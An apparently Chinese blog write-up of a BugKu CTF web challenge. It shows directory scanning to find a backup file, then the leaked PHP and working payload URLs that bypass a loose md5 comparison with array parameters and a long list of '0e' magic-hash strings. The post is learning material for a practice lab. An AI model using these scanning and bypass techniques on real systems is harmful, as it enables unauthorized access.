BugKu---------备份是个好习惯

最新推荐文章于 2024-07-06 17:10:42 发布
最新推荐文章于 2024-07-06 17:10:42 发布
阅读量1.9k 收藏 16
点赞数 5
分类专栏: CTF笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45616570/article/details/118158581
版权

title: BugKu---------备份是个好习惯
date: 2021-06-23 16:48:44
description: 前言:零度安全搭建博客后的第N篇文章
top:
categories: BugKu刷题
tags:

  • 网络安全
  • BugKu

BugKu---------备份是个好习惯

默默成长的web狗,BugKu,那个菜鸡又回来刷题了。

题目

image-20210623154432172

解题思路

​ 题目上说是备份是个好习惯,所以我们第一要想到使用disearch这个工具去扫描指定的URL

解题过程

  1. 打开kali,运行disearch这个py脚本,执行payload

    dirsearch.py -u http://114.67.246.176:13080/

    image-20210623155152435

  2. 访问备份的链接,获取到备份文件

    http://114.67.246.176:13080/index.php.bak

    image-20210623155606364

  3. 打开备份文件,发现是一个PHP代码

    <?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

  4. 上段代码的意思是需要两个不同的key不同,但是两个key的md5的值是相同的

    1. 使用kekeyy数组进行绕过,md5函数无法处理数组,这样就会返回两个NULL,而两个NULL的md5值是一样的,但是传入的key值可以不同。

      http://114.67.246.176:13080/?kekeyy1[]=aaa&kekeyy2[]=bb

      image-20210623162445694

    2. 使用==这个的比较漏洞,如果两个字符经过md5加密后的值是0exxxxx形式,在科学计数法中会被认为是0*10的几次方的,结果是0。此时,md5加密值相等,但是key值是不等的,下面是md5加密后是0exxxxx形式的。

      240610708
0e462097431906509019562988736854
QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469 
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904 
s878926199a
0e545993274517709034328855841020 
s1091221200a
0e940624217856561557816327384675 
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752  
s155964671a
0e342768416822451524974117254469  
s1184209335a
0e072485820392773389523109082030  
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752  
s1091221200a
0e940624217856561557816327384675 
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787 
s155964671a
0e342768416822451524974117254469 
s1091221200a
0e940624217856561557816327384675 
s1836677006a
0e481036490867661113260034900752  
s1885207154a
0e509367213418206700842008763514  
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752 
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

      构造payload如下

      http://114.67.246.176:13080/?kekeyy1=240610708&kekeyy2=QNKCDZO

      image-20210623163323022

r1ng_13
关注
专栏目录
CTF之Bugku 备份是个好习惯
weixin_41607190的博客
10-07 387
原理:御剑扫描后台网址,分析代码,提交的url会过滤key字符,构造kkeyey=参数;使md5字符不同,值相同,MD5绕过 发现有个index.php.bak,打开是下载一个东西 <?php /** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22 */ include_once "flag...
Bugku-web-备份是个好习惯wireUp
resdust的博客
02-08 503
入门级web题
Bugku-web-备份是个好习惯
最新发布
qq_68457525的博客
07-06 330
ctf练习中一道关于备份文件扫描以及md5绕过的方法
BugKu备份是个好习惯
Zeker62的博客
09-16 921
解题过程 了解到备份二字,说明可能存在备份文件。 备份文件的好处是:浏览器无法解析带有备份后缀的文件,之后会直接提供用户下载到本地,用户通过去掉备份后缀打开可以查看页面源代码进行代码审计 通过查找,查到index.php.bak这个备份文件 在浏览器输入后下载到本地返现是PHP代码: <?php /** * Created by PhpStorm. * User: Norse * D...
BUGKU-WEB 备份是个好习惯
天泽岁月
02-23 2832
BUGKU-WEB 备份是个好习惯,MD5 弱比较
Bugku——备份是个好习惯
矜庄寂寥的博客
11-04 275
目录 题目 常见的网站源码备份文件后缀名 常见的网站源码备份文件名 解题思路 MD5弱比较绕过方法 刚刚做的一道CTF,挺有意思的 题目 进入环境,页面很简单,只有一串字符串 尝试了很多加密都没有结果,先放着吧 既然提示备份,那先看看备份文件 常见的网站源码备份文件后缀名 .rar .zip .7z .tar.gz .bak .swp .txt .html 常见的网站源码备份文件名 web website backup back www wwwroot.
备份是个好习惯(详解)——bugku
weixin_34342905的博客
07-16 408
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! Challenge 728 Solves 备份是个好习惯 80 http://120.24.86.145:8002/web16/ 听说备份...
BugKuCTF中套路满满的题-------备份是个好习惯
qq_42133828的博客
12-07 3236
首先就点进去是一串字符 d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e 仔细看会发现这是两个一样的字符串,只不过拼接在一起了,MD5解密后的明文是  空 再看题目的标题是备份,那么就看看本网页的备份文件把 输入 123.206.87.240:8002/web16/index.php.bak 注:.bak...
Bugku-web之cookies
weixin_42939822的博客
03-13 1602
一打开题目,发现一系列重复的字符串,受到“备份是个好习惯”题目的影响,不自觉地对这串字符串进行了各种解密,无果…… 此时思路堵塞,无意间看到url中的payload格式,对filename变量进行了base64解码,得到了keys.txt的结果。 想到可能存在php常见的文件包含问题,于是对filename变量进行了更改,变更为index.php的base64加密,同时猜测line变量表示源码的行数,先另line=3,进行尝试,喜得猜想结果。 于是编写脚本,对index.php的源码进行提取。
Bugku-WEB-writeup(持续学习中~)
devil_sad的博客
11-12 3384
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文中红框中的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
BUGKU-WEB
wojiushilsy的博客
02-22 561
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
Bugku-备份是个好习惯 详解
sanqin_的博客
05-12 733
CTF题目,主要运用代码审计,md5漏洞,以及网页的备份文件的一些知识。
Bugku--备份是个好习惯
qq_75120258的博客
10-22 234
将get的两个参数中的key替换为空(这里可以用kekeyy绕过),然后对key1,key2的值进行md5加密,并进行比较,如果md5加密的值一样而未加密的值不同,就输出flag. md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。这里kekeyy绕过是为了防止将key替换成空。
bugku——备份是个好习惯
hhh
09-23 1423
  这道题搁置了快一个月了……今天终于把它给做了,心情还是很舒畅的&gt;-&lt;   首先打开题目,只有一串字符串,百度了一下发现是个md5加密,关键……原字符串还是个空字符串……(懵逼……)打开网页源代码也一样,没有任何提示,这时候,我们可以想到提示肯定是在题目里!备份是个好习惯~咦,是不是有一个备份文件呢?在题目的url里输入:http://120.24.86.145:8002/web1...
Bugku备份是个好习惯
foreverzwl
10-23 446
这题对于我这小白来说,有点难想,这里做一下记录: 根据题目提示:备份是个好习惯备份文件的扩展名为.bak,尝试输入http://123.206.87.240:8002/web16/index.php.bak,成功得到文件index.php.bak,内容如下: $_SERVER['REQUEST_URI']:https://blog.csdn.net/wjciayf/article/...
bugku备份是个好习惯
qq_42036164的博客
03-18 442
bugku备份是个好习惯 目录扫描工具大功率扫不到题目提示的备份文件,所以只能根据题目猜测备份文件所在的位置 打开本份文件,代码审计得到如果 $key1 和 $key2 的MD5值相等,且 $key1 和 $key2 本身不相等,则输出flag变量的值。 构造url:?kekeyy1[]=[1]&kekeyy2[]=[2] 这里key需要复写绕过。 得到flag。
BUgku---web---备份是个好习惯
weixin_47450099的博客
05-11 365
BUgku---web---备份是个好习惯 网络安全
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值